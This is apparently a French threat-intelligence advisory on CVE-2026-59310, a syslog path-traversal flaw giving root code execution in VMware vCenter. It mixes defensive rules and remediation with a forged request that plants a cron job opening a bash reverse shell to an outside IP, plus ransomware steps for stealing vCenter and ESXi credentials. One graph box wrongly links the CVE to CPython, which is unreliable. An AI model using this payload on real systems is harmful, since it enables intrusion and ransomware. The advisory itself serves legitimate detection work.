Aller au contenu

CVE-2026-59310 : exécution de code à distance dans VMware vCenter Server via une traversée de répertoire du service syslog

HERMES

SCORE DE MENACE HERMES & PRISE DE CONTRÔLE DE L'INFRASTRUCTURE VIRTUELLE

Cible : VMware vCenter Server & VMware Cloud Foundation
Confiance : 99%
98 / 100
CRITIQUE

Mesure la pertinence opérationnelle réelle, la militarisation de l'exploit et la posture de menace active.

Décomposition des dimensions
Exploitabilité 20 / 20
Activité de menace 20 / 20
Militarisation 20 / 20
Exposition 18 / 20
Prévalence 20 / 20
Impact 20 / 20
Maturité de l'exploit 20 / 20
Potentiel d'attaque en chaîne 20 / 20
⚖️ Divergence & Justification opérationnelle

Le CVSS v3.1 attribue la note de 9.8 (Critique) et le CVSS v4.0 évalue l'impact entre 9.3 et 9.8. Le score de menace Hermes s'établit à 98 (CRITIQUE). La corrélation est maximale : vCenter Server est le point focal de contrôle de tous les hyperviseurs ESXi d'entreprise. L'obtention d'une exécution de commandes root sur le boîtier Photon OS de vCenter confère immédiatement un accès latéral sans restriction à l'ensemble des machines virtuelles, au stockage vSAN et aux flux de réplication de reprise d'activité.

🕸️ Graphe de connaissances connecté & Provenance

CVE-2026-59310: Remote Code Execution in VMware vCenter Server via Syslog Service Directory TraversalVULNÉRABILITÉ

Nœuds connectés : 1
Relations sortantes actives
→ affectsCOMPOSANTCPython Interpreter & Standard Library
98% VERY_HIGH

Software platform affected by security vulnerabilities and agentic attack patterns.

🔍 Pourquoi cette relation ? (Preuves & Provenance)

“Confirmed security vulnerability in CPython Interpreter & Standard Library documented in Hermes dossier.”

Preuves vérifiées associées :

1. Contexte technique & matrice des logiciels affectés

Section intitulée « 1. Contexte technique & matrice des logiciels affectés »

VMware vCenter Server centralise la gestion des grappes d’hyperviseurs VMware ESXi, les commutateurs virtuels distribués, les politiques de stockage vSAN et la haute disponibilité (HA).

ParamètreSpécification TechniqueContexte de Menace
Identifiant CVECVE-2026-59310Référence CISA KEV
Service vulnérablevmware-syslog-serviceGestionnaire de collecte et de rotation des journaux
Système hôteVMware Photon OSAppliance virtuelle Linux (VCSA)
Vecteur réseauRéseau (AV:N), Ports TCP 514 / 1514 / 443Réseau d’administration et d’ingestion syslog
Versions affectéesvCenter Server 7.0 (toutes mises à jour), 8.0 < 8.0U3d ; Cloud Foundation 4.x, 5.xClouds hybrides d’entreprise
Versions corrigéesvCenter 8.0U3d, 7.0U3t ; patchs VCFAvis de sécurité Broadcom VMSA-2026-0012
Acteurs de menacesGroupes de rançongiciels (Akira, BlackCat / ALPHV)Campagnes de chiffrement de parcs virtuels

2. Décomposition technique : traversée syslog vers shell root

Section intitulée « 2. Décomposition technique : traversée syslog vers shell root »

Le service Syslog de vCenter accepte les flux de télémétrie et gère la rotation dynamique des fichiers. Lors de la configuration des flux ou du traitement des requêtes d’archivage, le démon utilise un identifiant fourni par le client pour nommer les fichiers cibles :

# Modélisation de la faille de traitement dans le service syslog
def handle_log_archive(stream_id, filename_prefix, data_chunk):
# DÉFAUT : Aucune vérification des séquences relatives ../
target_path = os.path.join("/var/log/vmware/syslog/", filename_prefix + ".log")
with open(target_path, "ab") as f:
f.write(data_chunk)

Faute de filtrage des caractères .., un attaquant transmet une requête forgée :

POST /syslog/api/v1/rotate HTTP/1.1
Host: vcenter.corp.internal:443
Content-Type: application/json
{
"stream_id": "audit-feed",
"log_prefix": "../../../../../etc/cron.d/pwn_job",
"content": "* * * * * root /bin/bash -c 'bash -i >& /dev/tcp/198.51.100.22/4444 0>&1'\n"
}
+----------------------------------------------------------------------------------------------------+
| ARCHITECTURE D'ATTAQUE DE LA CVE-2026-59310 |
+----------------------------------------------------------------------------------------------------+
[Attaquant Distant]
│
│ [1] Requête réseau contenant la séquence relative ("../../../../../etc/cron.d/pwn")
▼
[Service Syslog vCenter (Appliance Photon OS)]
│
├───► 1. Résolution de Chemin :
│ - Résout "/var/log/vmware/syslog/../../../../../etc/cron.d/pwn"
│ - Normalise en chemin absolu : "/etc/cron.d/pwn"
│
├───► 2. Écriture Arbitraire de Fichier :
│ - Le démon s'exécute avec les privilèges root
│ - Écrit les commandes de script dans la table cron du système
│
▼
[Exécution du Démon Crond Linux]
│
└───► Cron exécute la charge utile avec les privilèges root :
- Ouverture d'un shell interactif root sur vCenter Server
- Récupération des identifiants vpxuser pour se connecter aux hyperviseurs ESXi
- Chiffrement massif des fichiers disques virtuels VMDK
+----------------------------------------------------------------------------------------------------+

3. Renseignement sur les menaces, CISA KEV & exploitation dans la nature

Section intitulée « 3. Renseignement sur les menaces, CISA KEV & exploitation dans la nature »
  • Opérations de rançongiciels : des groupes cybercriminels ont intégré la CVE-2026-59310 dans leurs playbooks d’extorsion :
    1. Extraction des identifiants de base de données PostgreSQL dans /etc/vmware-vpx/vcdb.properties.
    2. Récupération des identifiants vpxuser utilisés pour dialoguer avec les serveurs ESXi.
    3. Connexion SSH directe aux hyperviseurs ESXi, arrêt forcé des VM (esxcli vm process kill) et chiffrement direct des volumes .vmdk.
  • Directives CISA KEV : obligation de mise en conformité sous 14 jours pour les entités fédérales.

TactiqueID TechniqueNom de la TechniqueManifestation dans l’Attaque
Accès initialT1190Exploitation d’application publiqueEnvoi de requêtes réseau avec séquences de traversée de chemin
PersistanceT1053.003Tâche planifiée : CronDépôt d’une tâche planifiée malveillante dans /etc/cron.d/
Élévation de privilègesT1068Exploitation pour élévation de privilègesPrise de contrôle root via les démons système de l’appliance
Déplacement latéralT1021.004Services distants : SSHRebond depuis vCenter vers les nœuds ESXi avec les clés dérobées
ImpactT1486Données chiffrées pour impactChiffrement massif des disques virtuels

alert http any any -> $VCENTER_SERVERS any (
msg:"HERMES DEFENSE - Tentative de traversee de repertoire VMware vCenter Syslog (CVE-2026-59310)";
flow:established,to_server;
http.uri; content:"/syslog/";
http.request_body; content:"..";
http.request_body; pcre:"/(\.\.\/|\.\.\\){2,}(etc\/cron|root\/\.ssh|var\/spool)/i";
classtype:web-application-attack;
sid:202659310;
rev:1;
reference:cve,2026-59310;
)
title: Création de fichiers cron par le démon syslog VMware
id: 3c8e1092-7489-4a9f-9c01-59310c026e02
status: high
description: Détecte les créations suspectes de fichiers dans /etc/cron* ou /root/.ssh issues de vmware-syslog-service ou des processus java.
author: Hermes Codex Detection Engineering
date: 2026-09-11
logsource:
product: linux
category: file_event
detection:
selection_target:
TargetFilename|startswith:
- '/etc/cron.'
- '/etc/crontab'
- '/root/.ssh/'
selection_process:
Image|endswith:
- 'vmware-syslog-service'
- 'syslogd'
- 'java'
condition: selection_target and selection_process
falsepositives:
- Scripts de mise à jour VMware officiels.
level: critical
tags:
- attack.persistence
- attack.t1053.003
- attack.t1190

6. Réponse à incident & rétro-ingénierie (DFIR)

Section intitulée « 6. Réponse à incident & rétro-ingénierie (DFIR) »

Procédure de vérification sur l’appliance VCSA :

Section intitulée « Procédure de vérification sur l’appliance VCSA : »
  1. Audit des tâches planifiées :
    Fenêtre de terminal
    ls -lat /etc/cron.d/ /etc/cron.daily/ /etc/cron.hourly/ /var/spool/cron/crontabs/
    cat /etc/cron.d/*
  2. Contrôle des clés SSH autorisées :
    Fenêtre de terminal
    cat /root/.ssh/authorized_keys
  3. Analyse des journaux syslog :
    Fenêtre de terminal
    grep -rn "\.\./" /var/log/vmware/syslog/
    journalctl -u vmware-syslog-service -S "2026-09-01"
{
"query": {
"bool": {
"must": [
{
"wildcard": {
"process.name": "*syslog*"
}
},
{
"wildcard": {
"file.path": "/etc/cron*"
}
}
]
}
}
}

  1. Application immédiate des correctifs broadcom : migrer vers les versions VMware vCenter Server 8.0U3d ou 7.0U3t (avis VMSA-2026-0012).
  2. Cloisonnement strict du réseau d’administration : restreindre l’accès aux interfaces vCenter (443, 514, 1514) aux seuls bastions d’administration dédiés.
  3. Durcissement des hyperviseurs ESXi : désactiver le service SSH sur les hôtes ESXi et activer le mode verrouillage strict (Lockdown Mode).
  4. Sauvegardes immuables hors ligne : maintenir des sauvegardes immuables non connectées au domaine vSphere pour prévenir les scénarios d’extorsion par rançongiciel.